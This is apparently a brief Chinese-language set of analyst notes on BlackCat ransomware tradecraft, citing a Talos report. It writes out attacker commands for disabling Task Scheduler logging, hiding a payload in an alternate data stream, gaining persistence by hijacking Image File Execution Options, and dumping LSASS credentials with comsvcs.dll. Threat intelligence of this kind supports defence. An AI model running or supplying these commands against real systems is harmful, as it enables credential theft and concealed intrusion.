BlackCat勒索
链接:https://blog.talosintelligence.com/2022/03/from-blackmatter-to-blackcat-analyzing.html
在设置反向 ssh 计划任务工具之前,攻击者禁用了任务计划程序的日志
c:\windows\system32\wevtutil.exe set-log microsoft-windows-taskscheduler/operational /enabled:false
C++实现了写入 C:\目录的alternate data stream (ADS)流隐藏
c:\windows\system32\windowspowershell\v1.0\powershell.exe -command & {(get-content c:\system -raw | set-content c:\ -stream ‘cachetask’)}
利用镜像劫持做自启动项
c:\windows\system32\reg.exe add hklm\software\microsoft\windows nt\currentversion\image file execution options\taskmgr.exe /v debugger /t reg_sz /d c:\system
直接使用系统的comsvcs.dll 转储 LSASS 内存
powershell rundll32.exe c:\windows\system32\comsvcs.dll, minidump